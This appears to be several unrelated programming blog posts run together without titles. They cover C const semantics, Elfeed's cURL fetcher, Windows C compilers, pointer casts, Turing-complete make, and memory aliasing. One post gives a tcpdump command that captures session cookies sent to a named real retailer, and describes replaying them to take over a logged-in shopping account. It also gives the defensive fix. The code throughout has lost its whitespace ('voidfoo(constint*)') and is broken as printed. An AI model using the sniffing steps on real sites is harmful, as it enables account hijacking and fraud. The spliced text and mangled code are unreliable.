Today there was a question on /r/C_Programming about the
effect of C’s const on optimization. Variations of this question
have been asked many times over the past two decades. Personally, I
blame naming of const.
Given this program:
voidfoo(constint*);intbar(void){intx=0;inty=0;for(inti=0;i<10;i++){foo(&x);y+=x;// this load not optimized out
}returny;}
The function foo takes a const pointer pointer to const,
which is a promise from the author of foo that it won’t modify the
value of x. Given this information, it would seem the compiler may
assume x is always zero, and therefore y is always zero.
However, inspecting the assembly output of several different compilers
shows that x is loaded each time around the loop. Here’s gcc 4.9.2
at -O3, with annotations.
bar:pushrbppushrbxxorebp,ebp; y = 0movebx,0xa; loop variable isubrsp,0x18; allocate xmovdword[rsp+0xc],0; x = 0.L0:leardi,[rsp+0xc]; compute &xcallfooaddebp,dword[rsp+0xc]; y += x (not optmized?)subebx,1jne.L0addrsp,0x18; deallocate xmoveax,ebp; return ypoprbxpoprbpret
The output of clang 3.5 (with -fno-unroll-loops) is the same, except
ebp and ebx are swapped, and the computation of &x is hoisted out of
the loop, into r14.
Are both compilers failing to take advantage of this useful
information? Wouldn’t it be undefined behavior for foo to modify
x? Surprisingly, the answer is no. In this situation, this would
be a perfectly legal definition of foo.
The key thing to remember is that const doesn’t mean
constant. Chalk it up as a misnomer. It’s not an
optimization tool. It’s there to inform programmers — not the compiler
— as a tool to catch a certain class of mistakes at compile time. I
like it in APIs because it communicates how a function will use
certain arguments, or how the caller is expected to handle returned
pointers. It’s usually not strong enough for the compiler to change
its behavior.
Despite what I just said, occasionally the compiler can take
advantage of const for optimization. The C99 specification, in
§6.7.3¶5, has one sentence just for this:
If an attempt is made to modify an object defined with a
const-qualified type through use of an lvalue with
non-const-qualified type, the behavior is undefined.
The original x wasn’t const-qualified, so this rule didn’t apply.
And there aren’t any rules against casting away const to modify an
object that isn’t itself const. This means the above (mis)behavior
of foo isn’t undefined behavior for this call. Notice how the
undefined-ness of foo depends on how it was called.
With one tiny tweak to bar, I can make this rule apply, allowing the
optimizer do some work on it.
constintx=0;
The compiler may now assume that foo modifying x is undefined
behavior, therefore it never happens. For better or worse, this is
a major part of how a C optimizer reasons about your programs. The
compiler is free to assume x never changes, allowing it to optimize
out both the per-iteration load and y.
The load disappears, y is gone, and the function always returns
zero.
Curiously, the specification allows the compiler to go even further.
It’s permitted to allocate x somewhere off the stack, even in
read-only memory. For example, it could perform a transformation like
this:
Neither clang nor gcc took it this far, perhaps because it’s more
disruptive to badly-behaved programs.
Even with this special const rule, only use const for yourself and
for your fellow human programmers. Let the optimizer reason for itself
about what is constant and what is not.
My wife was shopping online for running shoes when she got this
classic Firefox pop-up.
These days this is usually just a server misconfiguration annoyance.
However, she was logged into an account, which included a virtual
shopping cart and associated credit card payment options, meaning
actual sensitive information would be at risk.
The main culprit was the website’s search feature, which wasn’t
transmitted over HTTPS. There’s an HTTPS version of the search (which
I found manually), but searches aren’t directed there. This means it’s
also vulnerable to SSL stripping.
Fortunately Firefox warns about the issue and requires a positive
response before continuing. Neither Chrome nor Internet Explorer get
this right. Both transmit session cookies in the clear without
warning, then subtly mention it after the fact. She may not have even
noticed the problem (and then asked me about it) if not for that
pop-up.
I contacted the website’s technical support two weeks ago and they
never responded, nor did they fix any of their issues, so for now you
can see this all for yourself.
Finding the session cookies
To prove to myself that this whole situation was really as bad as it
looked, I decided to steal her session cookie and use it to manipulate
her shopping cart. First I hit F12 in her browser to peek at the
network headers. Perhaps nothing important was actually sent in the
clear.
The session cookie (red box) was definitely sent in the request. I
only need to catch it on the network. That’s an easy job for tcpdump.
tcpdump -A -l dst www.roadrunnersports.com and dst port 80 | \
grep "^Cookie: "
This command tells tcpdump to dump selected packet content as ASCII
(-A). It also sets output to line-buffered so that I can see packets
as soon as they arrive (-l). The filter will only match packets
going out to this website and only on port 80 (HTTP), so I won’t see
any extraneous noise (dst <addr> and dst port <port>). Finally, I
crudely run that all through grep to see if any cookies fall out.
On the next insecure page load I get this (wrapped here for display)
spilling many times into my terminal:
That’s a bingo! I massage this into a bit of JavaScript, go to the
store page in my own browser, and dump it in the developer console. I
don’t know which cookies are important, but that doesn’t matter. I
take them all.
Refresh the page and now I’m logged in. I can see what’s in the
shopping cart. I can add and remove items. I can checkout and complete
the order. My browser is as genuine as hers.
How to fix it
The quick and dirty thing to do is set the Secure and
HttpOnly flags on all cookies. The first prevents cookies
from being sent in the clear, where a passive observer might see them.
The second prevents the JavaScript from accessing them, since an
active attacker could inject their own JavaScript in the page.
Customers would appear to be logged out on plain HTTP pages, which is
confusing.
However, since this is an online store, there’s absolutely no excuse
to be serving anything over plain HTTP. This just opens customers up
to downgrade attacks. The long term solution, in addition to the
cookie flags above, is to redirect all HTTP requests to HTTPS and
never serve or request content over HTTP, especially not executable
content like JavaScript.
This morning I pushed out an important update to Elfeed, my
web feed reader for Emacs. The update should be available in MELPA by
the time you read this. Elfeed now has support for fetching feeds
using a cURL through a curl inferior process. You’ll need
the program in your PATH or configured through
elfeed-curl-program-name.
I’ve been using it for a couple of days now, but, while I work out the
remaining kinks, it’s disabled by default. So in addition to having
cURL installed, you’ll need to set elfeed-use-curl to non-nil.
Sometime soon it will be enabled by default whenever cURL is
available. The original url-retrieve fetcher will remain in place
for time time being. However, cURL may become a requirement someday.
Fetching with a curl inferior process has some huge advantages.
It’s much faster
The most obvious change is that you should experience a huge speedup
on updates and better responsiveness during updates after the first
cURL run. There are important two reasons:
Asynchronous DNS and TCP: Emacs 24 and earlier performs DNS
queries synchronously even for asynchronous network processes. This is
being fixed on some platforms (including Linux) in Emacs 25, but now
we don’t have to wait.
On Windows it’s even worse: the TCP connection is also established
synchronously. This is especially bad when fetching relatively small
items such as feeds, because the DNS look-up and TCP handshake dominate
the overall fetch time. It essentially makes the whole process
synchronous.
Conditional GET: HTTP has two mechanism to avoid transmitting
information that a client has previously fetched. One is the
Last-Modified header delivered by the server with the content. When
querying again later, the client echos the date back like a
token in the If-Modified-Since header.
The second is the “entity tag,” an arbitrary server-selected token
associated with each version of the content. The server delivers it
along with the content in the ETag header, and the client hands it
back later in the If-None-Match header, sort of like a cookie.
This is highly valuable for feeds because, unless the feed is
particularly active, most of the time the feed hasn’t been updated
since the last query. This avoids sending anything other hand a
handful of headers each way. In Elfeed’s case, it means it doesn’t
have to parse the same XML over and over again.
Both of these being outside of cURL’s scope, Elfeed has to manage
conditional GET itself. I had no control over the HTTP headers until
now, so I couldn’t take advantage of it. Emacs’ url-retrieve
function allows for sending custom headers through dynamically binding
url-request-extra-headers, but this isn’t available when calling
url-queue-retrieve since the request itself is created
asynchronously.
Both the ETag and Last-Modified values are stored in the database and
persist across sessions. This is the reason the full speedup isn’t
realized until the second fetch. The initial cURL fetch doesn’t have
these values.
Fewer bugs
As mentioned previously, Emacs has a built-in URL retrieval library
called url. The central function is url-retrieve which
asynchronously fetches the content at an arbitrary URL (usually HTTP)
and delivers the buffer and status to a callback when it’s ready.
There’s also a queue front-end for it, url-queue-retrieve which
limits the number of parallel connections. Elfeed hands this function
a pile of feed URLs all at once and it fetches them N at a time.
Unfortunately both these functions are incredibly buggy. It’s been a
thorn in my side for years.
It takes a URL and a callback. Seeing this, the sane, unsurprising
expectation is the callback will be invoked exactly once for time
url-retrieve was called. In any case where the request fails, it
should report it through the callback. This is not the case.
The callback may be invoked any number of times, including zero.
In this example, suppose you have a webserver on port 8080 that will
return an HTTP 404 at the given URL. Below, I fire off 10
asynchronous requests in a row.
What would you guess is the length of results? It’s initially 0
before any requests complete and over time (a very short time) I would
expect this to top out at 10. On Emacs 24, here’s the real answer:
(length results)
;; => 46
The same error is reported multiple times to the callback. At least
the pattern is obvious.
What’s the length of results? This time it’s zero. Remember how DNS
is synchronous? Because of this, DNS failures are reported
synchronously as a signaled error. This gets a lot worse with
url-queue-retrieve. Since the request is put off until later, DNS
doesn’t fail until later, and you get neither a callback nor an error
signal. This also puts the queue in a bad state and necessitated
elfeed-unjam for manually clear it. This one should get fixed in
Emacs 25 when DNS is asynchronous.
This last one assumes you don’t have anything listening on port 57432
(pulled out of nowhere) so that the connection fails.
On Linux, we finally get the sane result of 10. However, on Windows,
it’s zero. The synchronous TCP connection will fail, signaling an
error just like DNS failures. Not only is it broken, it’s broken in
different ways on different platforms.
There are many more cases of callback weirdness which depend on the
connection and HTTP session being in various states when thing go
awry. These were just the easiest to demonstrate. By using cURL, I get
to bypass this mess.
No more GnuTLS issues
At compile time, Emacs can optionally be linked against GnuTLS, giving
it robust TLS support so long as the shared library is available.
url-retrieve uses this for fetching HTTPS content. Unfortunately,
this library is noisy and will occasionally echo non-informational
messages in the minibuffer and in *Messages* that cannot be
suppressed.
When not linked against GnuTLS, Emacs will instead run the GnuTLS
command line program as an inferior process, just like Elfeed now does
with cURL. Unfortunately this interface is very slow and frequently
fails, basically preventing Elfeed from fetching HTTPS feeds. I
suspect it’s in part due to an improper coding-system-for-read.
cURL handles all the TLS negotation itself, so both these problems
disappear. The compile-time configuration doesn’t matter.
Windows is now supported
Emacs’ Windows networking code is so unstable, even in Emacs 25, that
I couldn’t make any practical use of Elfeed on that platform. Even the
Cygwin emacs-w32 version couldn’t cut it. It hard crashes Emacs every
time I’ve tried to fetch feeds. Fortunately the inferior process code
is a whole lot more stable, meaning fetching with cURL works great. As
of today, you can now use Elfeed on Windows. The biggest obstable is
getting cURL installed and configured.
Interface changes
With cURL, obviously the values of url-queue-timeout and
url-queue-parallel-processes no longer have any meaning to Elfeed.
If you set these for yourself, you should instead call the functions
elfeed-set-timeout and elfeed-set-max-connections, which will do
the appropriate thing depending on the value of elfeed-use-curl.
Each also comes with a getter so you can query the current value.
The deprecated elfeed-max-connections has been removed.
Feed objects now have meta tags :etag, :last-modified, and
:canonical-url. The latter can identify feeds that have been moved,
though it needs a real UI.
See any bugs?
If you use Elfeed, grab the current update and give the cURL fetcher a
shot. Please open a ticket if you find problems. Be sure to report
your Emacs version, operating system, and cURL version.
As of this writing there’s just one thing missing compared to
url-queue: connection reuse. cURL supports it, so I just need to code
it up.
I primarily work on and develop for unix-like operating systems —
Linux in particular. However, when it comes to desktop applications,
most potential users are on Windows. Rather than develop on Windows,
which I’d rather avoid, I’ll continue developing, testing, and
debugging on Linux while keeping portability in mind. Unfortunately
every option I’ve found for building Windows C programs has some
significant limitations. These limitations advise my approach to
portability and restrict the C language features used by the program
for all platforms.
As of this writing I’ve identified four different practical ways to
build C applications for Windows. This information will definitely
become further and further out of date as this article ages, so if
you’re visiting from the future take a moment to look at the date.
Except for LLVM shaking things up recently, development tooling on
unix-like systems has had the same basic form for the past 15 years
(i.e. dominated by GCC). While Visual C++ has been around for more
than two decades, the tooling on Windows has seen more churn by
comparison.
Before I get into the specifics, let me point out a glaring problem
common to all four: Unicode arguments and filenames. Microsoft jumped
the gun and adopted UTF-16 early. UTF-16 is a kludge, a worst of all
worlds, being a variable length encoding (surrogate pairs), backwards
incompatible (unlike UTF-8), and having byte-order issues
(BOM). Most Win32 functions that accept strings generally come in two
flavors, ANSI and UTF-16. The standard, portable C library functions
wrap the ANSI-flavored functions. This means portable C programs
can’t interact with Unicode filenames. They must call the
non-portable, Windows-specific versions. This includes main itself,
which is only handed ANSI-truncated arguments.
Compare this to unix-like systems, which generally adopted UTF-8, but
rather as a convention than as a hard rule. The operating system
doesn’t know or care about Unicode. Program arguments and filenames
are just zero-terminated bytestrings. Implicitly decoding these as
UTF-8 would be a mistake anyway. What happens when the
encoding isn’t valid?
This doesn’t have to be a problem on Windows. A Windows standard C
library could connect to Windows’ Unicode-flavored functions and
encode to/from UTF-8 as needed, allowing portable programs to maintain
the bytestring illusion. It’s only that none of the existing standard
C libraries do it this way.
Mingw-w64
Of course my first natural choice is MinGW, specifically the
Mingw-w64 fork. It’s GCC ported to Windows. You can
continue relying on GCC-specific features when you need them. It’s got
all the core language features up through C11, plus the common
extensions. It’s probably packaged by your Linux distribution of
choice, making it trivial to cross-compile programs and libraries from
Linux — and with Wine you can even execute them on x86. Like regular
GCC, it outputs GDB-friendly DWARF debugging information, so you can
debug applications with GDB (my favorite).
If I’m using Mingw-w64 on Windows, I prefer to do so from inside
Cygwin. Since it provides a complete POSIX environment, it maximizes
portability for the whole tool chain. This isn’t strictly required.
However, it has one big flaw. Unlike unix-like systems, Windows
doesn’t supply a system standard C library. That’s the compiler’s job.
But Mingw-w64 doesn’t have one. Instead it links against
msvcrt.dll, which isn’t officially supported by Microsoft.
It just happens to exist on modern Windows installations. Since it’s
not supported, it’s way out of date and doesn’t support much of C99,
let alone C11. A lot of these problems are patched over by the
compiler, but if you’re relying on Mingw-w64, you still have to
stick to some C89 library features, such as limiting yourself
to the C89 printf specifiers.
Update: Mārtiņš Možeiko has pointed out __USE_MINGW_ANSI_STDIO, an
undocumented feature that fixes the printf family.
Visual C++
The behemoth usually considered in this situation is Visual Studio and
the Visual C++ build tools. I strongly prefer open source development
tools, and Visual Studio obviously the least open source option, but
at least it’s cost-free these days. Now, I have absolutely no interest
in Visual Studio, but fortunately the Visual C++ compiler and
associated build tools can be used standalone, supporting both C and
C++.
Included is a “vcvars” batch file — vcvars64.bat for x64. Execute that
batch file in a cmd.exe console and the Visual C++ command line build
tools will be made available in that console and in any programs
executed from it (your editor). It includes the compiler (cl.exe),
linker (link.exe), assembler (ml64.exe), disassembler (dumpbin.exe),
and more. It also includes a mostly POSIX-complete make called
nmake.exe. All these tools are noisy and print a copyright banner on
every invocation, so get used to passing -nologo every time, which
suppresses some of it.
When I said behemoth, I meant it. In my experience it literally takes
hours (unattended) to install Visual Studio 2015. The good news is
you don’t actually need it all anymore. The build tools are available
standalone. While it’s still a larger and slower installation
process than it really should be, it’s is much more reasonable to
install. It’s good enough that I’d even say I’m comfortable relying on
it for Windows builds.
That being said, it’s not without its flaws. Microsoft has never
announced any plans to support C99. They only care about C++, with C
as a second class citizen. Since C++11 incorporated most of C99 and
Microsoft supports C++11, Visual Studio 2015 very nearly supports
all of C99, even more than Mingw-w64. The only things missing as far
as I can tell are variable length arrays (VLAs), complex numbers, and
C99’s array parameter declarators, since none of these were adopted by
C++. Some C99 features are considered extensions (as they would be for
C89), so you’ll also get warnings about them, which can be disabled.
The command line interface (option flags, intermediates, etc.) isn’t
quite reconcilable with the unix-like ecosystem (i.e. GCC, Clang), so
you’ll need separate Makefiles, or you’ll need to use a build
system that generates Visual C++ Makefiles.
Debugging is a major problem. Visual C++ outputs separate .pdb
program database files, which aren’t usable from GDB. Visual
Studio has a built-in debugger, though it’s not included in the
standalone Visual C++ build tools. I’m still searching for a decent
debugging solution for this scenario. I tried WinDbg, but I can’t
stand it.
In general the output code performance is on par with GCC and Clang,
so you’re not really gaining or losing performance with Visual C++.
Clang
Unsurprisingly, Clang has been ported to Windows. It’s like
Mingw-w64 in that you get the same features and interface across
platforms.
Unlike Mingw-w64, it doesn’t link against msvcrt.dll. Instead it
relies directly on the official Windows SDK. You’ll basically need
to install the Visual C++ build tools as if were going to build with
Visual C++. This means no practical cross-platform builds and you’re
still relying on the proprietary Microsoft toolchain. In the past you
even had to use Microsoft’s linker, but LLVM now provides its own.
It generates GDB-friendly DWARF debug information (in addition to
CodeView) so in theory you can debug with GDB again. I haven’t
given this a thorough evaluation yet.
Pelles C
Finally there’s Pelles C. It’s cost-free but not open
source. It’s a reasonable, small install that includes a full IDE with
an integrated debugger and command line tools. It has its own C
library and Win32 SDK with the most complete C11 support around. It
also supports OpenMP 3.1. All in all it’s pretty nice and is something
I wouldn’t be afraid to rely upon for Windows builds.
Like Visual C++, it has a couple of “povars” batch files to set up the
right environment, which includes a C compiler, linker, assembler,
etc. The compiler interface mostly mimics cl.exe, though there are far
fewer code generation options. The make program, pomake.exe, mimics
nmake.exe, but is even less POSIX-complete. The compiler’s output
code performance is also noticeably poorer than GCC, Clang, and Visual
C++. It’s definitely a less mature compiler.
It outputs CodeView debugging information, so GDB is of no use.
The best solution is to simply use the compiler built into the IDE,
which can be invoked directly from the command line. You don’t
normally need to code from within the IDE just to use the debugger.
Like Visual C++, it’s Windows only, so cross-compilation isn’t really
in the picture.
If performance isn’t of high importance, and you don’t require
specific code generation options, then Pelles C is a nice choice for
Windows builds.
Other Options
I’m sure there are a few other options out there, and I’d like to hear
about them so I can try them out. I focused on these since they’re all
cost free and easy to download. If I have to register or pay, then
it’s not going to beat these options.
Occasionally I’ve needed to key a hash table with C pointers. I don’t
care about the contents of the object itself — especially if it might
change — just its pointer identity. For example, suppose I’m using
null-terminated strings as keys and I know these strings will always
be interned in a common table. These strings can be compared directly
by their pointer values (str_a == str_b) rather than, more slowly,
by their contents (strcmp(str_a, str_b) == 0). The intern table
ensures that these expressions both have the same result.
As a key in a hash table, or other efficient map/dictionary data
structure, I’ll need to turn pointers into numerical values. However,
C pointers aren’t integers. Following certain rules it’s permitted
to cast pointers to integers and back, but doing so will reduce the
program’s portability. The most important consideration is that the
integer form isn’t guaranteed to have any meaningful or stable
value. In other words, even in a conforming implementation, the same
pointer might cast to two different integer values. This would break
any algorithm that isn’t keenly aware of the implementation details.
To show why this is, I’m going to be citing the relevant parts of the
C99 standard (ISO/IEC 9899:1999). The draft for C99 is freely
available (and what I use myself since I’m a cheapass). My purpose is
not to discourage you from casting pointers to integers and using
the result. The vast majority of the time this works fine and as you
would expect. I just think it’s an interesting part of the language,
and C/C++ programmers should be aware of potential the trade-offs.
Integer to pointer casts
What does the standard have to say about casting pointers to integers?
§6.3.2.3¶5:
An integer may be converted to any pointer type. Except as
previously specified, the result is implementation-defined, might
not be correctly aligned, might not point to an entity of the
referenced type, and might be a trap representation.
It also includes a footnote:
The mapping functions for converting a pointer to an integer or an
integer to a pointer are intended to be consistent with the
addressing structure of the execution environment.
Casting an integer to a pointer depends entirely on the
implementation. This is intended for things like memory mapped
hardware. The programmer may need to access memory as a specific
physical address, which would be encoded in the source as an integer
constant and cast to a pointer of the appropriate type.
It may also be used by a loader and dynamic linker to compute the
virtual address of various functions and variables, then cast to a
pointer before use.
Both cases are already dependent on implementation defined behavior,
so there’s nothing lost in relying on these casts.
An integer constant expression of 0 is a special case. It casts to a
NULL pointer in all implementations (§6.3.2.3¶3). However, a NULL
pointer doesn’t necessarily point to address zero, nor is it
necessarily a zero bit pattern (i.e. beware memset and calloc on
memory with pointers). It’s just guaranteed never to compare equally
with a valid object, and it is undefined behavior to dereference.
Pointer to integer casts
What about the other way around? §6.3.2.3¶6:
Any pointer type may be converted to an integer type. Except as
previously specified, the result is implementation-defined. If the
result cannot be represented in the integer type, the behavior is
undefined. The result need not be in the range of values of any
integer type.
Like before, it’s implementation defined. However, the negatives are a
little stronger: the cast itself may be undefined behavior. I
speculate this is tied to integer overflow. The last part makes
pointer to integer casts optional for an implementation. This is one
way that the hash table above would be less portable.
When the cast is always possible, an implementation can provide an
integer type wide enough to hold any pointer value. §7.18.1.4¶1:
The following type designates a signed integer type with the
property that any valid pointer to void can be converted to this
type, then converted back to pointer to void, and the result will
compare equal to the original pointer:
intptr_t
The following type designates an unsigned integer type with the
property that any valid pointer to void can be converted to this
type, then converted back to pointer to void, and the result will
compare equal to the original pointer:
uintptr_t
These types are optional.
The take-away is that the integer has no meaningful value. The only
guarantee is that the integer can be cast back into a void pointer
that will compare equally. It would be perfectly legal for an
implementation to pass these assertions (and still sometimes fail).
Since the bits don’t have any particular meaning, arithmetic
operations involving them will also have no meaning. When a pointer
might map to two different integers, the hash values might not match
up, breaking hash tables that rely on them. Even with uintptr_t
provided, casting pointers to integers isn’t useful without also
relying on implementation defined properties of the result.
Reasons for this pointer insanity
What purpose could such strange pointer-to-integer casts serve?
A security-conscious implementation may choose to annotate pointers
with additional information by setting unused bits. It might be for
baggy bounds checks or, someday, in an undefined behavior
sanitizer. Before dereferencing annotated pointers, the
metadata bits would be checked for validity, and cleared/set before
use as an address. Or it may map the same object at multiple virtual
addresses) to avoid setting/clearing the metadata bits,
providing interoperability with code unaware of the annotations. When
pointers are compared, these bits would be ignored.
When these annotated pointers are cast to integers, the metadata bits
will be present, but a program using the integer wouldn’t know their
meaning without tying itself closely to that implementation.
Completely unused bits may even be filled with random garbage when
cast. It’s allowed.
You may have been thinking before about using a union or char * to
bypass the cast and access the raw pointer bytes, but you’d run into
the same problems on the same implementations.
Conforming programs
The standard makes a distinction between strictly conforming
programs (§4¶5) and conforming programs (§4¶7). A strictly
conforming program must not produce output depending on implementation
defined behavior nor exceed minimum implementation limits. Very few
programs fit in this category, including any program using uintptr_t
since it’s optional. Here are more examples of code that isn’t
strictly conforming:
On the other hand, a conforming program is allowed to depend on
implementation defined behavior. Relying on meaningful, stable values
for pointers cast to uintptr_t/intptr_t is conforming even if your
program may exhibit bugs on some implementations.
For over a decade now, GNU Make has almost exclusively been my build
system of choice, either directly or indirectly. Unfortunately this
means I unnecessarily depend on some GNU extensions — an annoyance
when porting to the BSDs. In an effort to increase the portability of
my Makefiles, I recently read the POSIX make specification. I
learned two important things: 1) POSIX make is so barren it’s not
really worth striving for, and 2) make’s macro assignment mechanism
is Turing-complete.
If you want to see it in action for yourself before reading further,
here’s a Makefile that implements Conway’s Game of Life (40x40) using
only macro assignments.
Run it with any make program in an ANSI terminal. It must literally
be named life.mak. Beware: if you run it longer than a few minutes,
your computer may begin thrashing.
make -f life.mak
It’s 100% POSIX-compatible except for the sleep 0.1 (fractional
sleep), which is only needed for visual effect.
A POSIX workaround
Unlike virtually every real world implementation, POSIX make doesn’t
support conditional parts. For example, you might want your Makefile’s
behavior to change depending on the value of certain variables. In GNU
Make it looks like this:
If the goal is to write a strictly POSIX Makefile, how could I work
around the lack of conditional parts and maintain a similar interface?
The selection of macro/variable to evaluate can be dynamically
selected, allowing for some useful tricks. First define the option’s
default:
USE_FOO = 0
Then define both sets of flags:
EXTRA_FLAGS_0 = -Wbar
EXTRA_FLAGS_1 = -ffoo -lfoo
Now dynamically select one of these macros for assignment to
EXTRA_FLAGS.
EXTRA_FLAGS = $(EXTRA_FLAGS_$(USE_FOO))
The assignment on the command line overrides the assignment in the
Makefile, so the user gets to override USE_FOO.
$ make # EXTRA_FLAGS = -Wbar
$ make USE_FOO=0 # EXTRA_FLAGS = -Wbar
$ make USE_FOO=1 # EXTRA_FLAGS = -ffoo -lfoo
Before reading the POSIX specification, I didn’t realize that the
left side of an assignment can get the same treatment. For example,
if I really want the “if defined” behavior back, I can use the macro
to mangle the left-hand side. For example,
Caveat: If DEBUG is set to empty, it may still result in true for
ifdef depending on which make flavor you’re using, but will always
appear to be unset in this hack.
$ make # EXTRA_FLAGS = -O3 -DNDEBUG
$ make DEBUG=yes # EXTRA_FLAGS = -O0 -g3
This last case had me thinking: This is very similar to the (ab)use of
the x86 mov instruction in mov is Turing-complete. These
macro assignments alone should be enough to compute any algorithm.
Macro Operations
Macro names are just keys to a global associative array. This can be
used to build lookup tables. Here’s a Makefile to “compute” the square
root of integers between 0 and 10.
The BSD flavors of make have a -V option for printing variables,
which is an easy way to retrieve output. I used an “immediate”
assignment (:=) for result since some versions of make won’t
evaluate the expression before -V printing.
$ make -f sqrt.mak -V result n=8
2.828427
Without -V, a default target could be used instead:
output :
@printf "$(result)\n"
There are no math operators, so performing arithmetic requires some
creativity. For example, integers could be represented as a
series of x characters. The number 4 is xxxx, the number 6 is
xxxxxx, etc. Addition is concatenation (note: macros can have + in
their names):
A = xxx
B = xxxx
A+B = $(A)$(B)
However, since there’s no way to “slice” a value, subtraction isn’t
possible. A more realistic approach to arithmetic would require lookup
tables.
Branching
Branching could be achieved through more lookup tables. For example,
$ make n=5 op=sqrt # 2.236068
$ make n=5 op=square # 25
Or using the DEBUG trick above, use the condition to mask out the
results of the unwanted branch. This is similar to the mov paper.
result := $(op)($(n)) = $($(op)_$(n))
result$(verbose) := $($(op)_$(n))
And its usage:
$ make n=5 op=square # 25
$ make n=5 op=square verbose=1 # square(5) = 25
What about loops?
Looping is a tricky problem. However, one of the most common build
(anti?)patterns is the recursive Makefile. Borrowing from the
mov paper, which used an unconditional jump to restart the program
from the beginning, for a Makefile Turing-completeness I can invoke
the Makefile recursively, restarting the program with a new set of
inputs.
Remember the print target above? I can loop by invoking make again
with new inputs in this target,
output :
@printf "$(result)\n"
@$(MAKE) $(args)
Before going any further, now that loops have been added, the natural
next question is halting. In reality, the operating system will take
care of that after some millions of make processes have carelessly
been invoked by this horribly inefficient scheme. However, we can do
better. The program can clobber the MAKE variable when it’s ready to
halt. Let’s formalize it.
Suppose we want to count down to 0. There will be an initial count:
count = 6
A decrement table:
6 = 5
5 = 4
4 = 3
3 = 2
2 = 1
1 = 0
0 = loop
The last line will be used to halt by clearing the name on the right
side. This is three star territory.
$($($(count))) =
The result (current iteration) loop value is computed from the lookup
table.
result = $($(count))
The next loop value is passed via args. If loop was cleared above,
this result will be discarded.
args = count=$(result)
With all that in place, invoking the Makefile will print a countdown
from 5 to 0 and quit. This is the general structure for the Game of
Life macro program.
Game of Life
A universal Turing machine has been implemented in Conway’s Game of
Life. With all that heavy lifting done, one of the easiest
methods today to prove a language’s Turing-completeness is to
implement Conway’s Game of Life. Ignoring the criminal inefficiency of
it, the Game of Life Turing machine could be run on the Game of Life
simulation running on make’s macro assignments.
In the Game of Life program — the one linked at the top of this
article — each cell is stored in a macro named xxyy, after its
position. The top-left most cell is named 0000, then going left to
right, 0100, 0200, etc. Providing input is a matter of assigning each
of these macros. I chose X for alive and - for dead, but, as
you’ll see, any two characters permitted in macro names would work as
well.
$ make 0000=X 0100=- 0200=- 0300=X ...
The next part should be no surprise: The rules of the Game of Life are
encoded as a 512-entry lookup table. The key is formed by
concatenating the cell’s value along with all its neighbors, with
itself in the center.
Note: The two right-hand X values here are the cell coming to life
(exactly three living neighbors). Computing the next value (n0101)
for 0101 is done like so:
The display output, to be given to printf, is built similarly:
output = $(n0000)$(n0100)$(n0200)$(n0300)...
In the real version, this is decorated with an ANSI escape code that
clears the terminal. The printf interprets the escape byte (\033)
so that it doesn’t need to appear literally in the source.
And that’s all there is to it: Conway’s Game of Life running in a
Makefile. Life, uh, finds a way.
Modern operating systems run processes within virtual memory using a
piece of hardware called a memory management unit (MMU). The MMU
contains a page table that defines how virtual memory maps onto
physical memory. The operating system is responsible for maintaining
this page table, mapping and unmapping virtual memory to physical
memory as needed by the processes it’s running. If a process accesses
a page that is not currently mapped, it will trigger a page fault
and the execution of the offending thread will be paused until the
operating system maps that page.
This functionality allows for a neat hack: A physical memory address
can be mapped to multiple virtual memory addresses at the same time. A
process running with such a mapping will see these regions of memory
as aliased — views of the same physical memory. A store to one of
these addresses will simultaneously appear across all of them.
Some useful applications of this feature include:
An extremely fast, large memory “copy” by mapping the source memory
overtop the destination memory.
Trivial interoperability between code instrumented with baggy
bounds checking [PDF] and non-instrumented code. A few bits
of each pointer are reserved to tag the pointer with the size of its
memory allocation. For compactness, the stored size is rounded up to
a power of two, making it “baggy.” Instrumented code checks this tag
before making a possibly-unsafe dereference. Normally, instrumented
code would need to clear (or set) these bits before dereferencing or
before passing it to non-instrumented code. Instead, the allocation
could be mapped simultaneously at each location for every possible
tag, making the pointer valid no matter its tag bits.
Two responses to my last post on hotpatching suggested
that, instead of modifying the instruction directly, memory
containing the modification could be mapped over top of the code. I
would copy the code to another place in memory, safely modify it in
private, switch the page protections from write to execute (both for
W^X and for other hardware limitations), then map it over
the target. Restoring the original behavior would be as simple as
unmapping the change.
Both POSIX and Win32 allow user space applications to create these
aliased mappings. The original purpose for these APIs is for shared
memory between processes, where the same physical memory is mapped
into two different processes’ virtual memory. But the OS doesn’t stop
us from mapping the shared memory to a different address within the
same process.
POSIX Memory Mapping
On POSIX systems (Linux, *BSD, OS X, etc.), the three key functions
are shm_open(3), ftruncate(2), and mmap(2).
First, create a file descriptor to shared memory using shm_open. It
has very similar semantics to open(2).
intshm_open(constchar*name,intoflag,mode_tmode);
The name works much like a filesystem path, but is actually a
different namespace (though on Linux it is a tmpfs mounted at
/dev/shm). Resources created here (O_CREAT) will persist until
explicitly deleted (shm_unlink(3)) or until the system reboots. It’s
an oversight in POSIX that a name is required even if we never intend
to access it by name. File descriptors can be shared with other
processes via fork(2) or through UNIX domain sockets, so a name
isn’t strictly required.
OpenBSD introduced shm_mkstemp(3) to solve this problem,
but it’s not widely available. On Linux, as of this writing, the
O_TMPFILE flag may or may not provide a fix (it’s
undocumented).
The portable workaround is to attempt to choose a unique name, open
the file with O_CREAT | O_EXCL (either atomically create the file or
fail), shm_unlink the shared memory object as soon as possible, then
cross our fingers. The shared memory object will still exist (the file
descriptor keeps it alive) but will not longer be accessible by name.
The shared memory object is brand new (O_EXCL) and is therefore of
zero size. ftruncate sets it to the desired size. This does not
need to be a multiple of the page size. Failing to allocate memory
will result in a bus error on access.
size_tsize=sizeof(uint32_t);ftruncate(fd,size);
Finally mmap the shared memory into place just as if it were a file.
We can choose an address (aligned to a page) or let the operating
system choose one for use (NULL). If we don’t plan on making any more
mappings, we can also close the file descriptor. The shared memory
object will be freed as soon as it completely unmapped (munmap(2)).
At this point both a and b have different addresses but point (via
the page table) to the same physical memory. Changes to one are
reflected in the other. So this:
*a=0xdeafbeef;printf("%p %p 0x%x\n",a,b,*b);
Will print out something like:
0x6ffffff0000 0x6fffffe0000 0xdeafbeef
It’s also possible to do all this only with open(2) and mmap(2) by
mapping the same file twice, but you’d need to worry about where to
put the file, where it’s going to be backed, and the operating system
will have certain obligations about syncing it to storage somewhere.
Using POSIX shared memory is simpler and faster.
Windows Memory Mapping
Windows is very similar, but directly supports anonymous shared
memory. The key functions are CreateFileMapping, and
MapViewOfFileEx.
First create a file mapping object from an invalid handle value. Like
POSIX, the word “file” is used without actually involving files.
Values in the address array must either be page-aligned or NULL to
allow the operating system to choose, in which case the map address is
written to the array.
It returns 0 on success. It may fail if the size is too small (0), too
large, too many file descriptors, etc.
Pass the same pointers back to memory_alias_unmap to free the
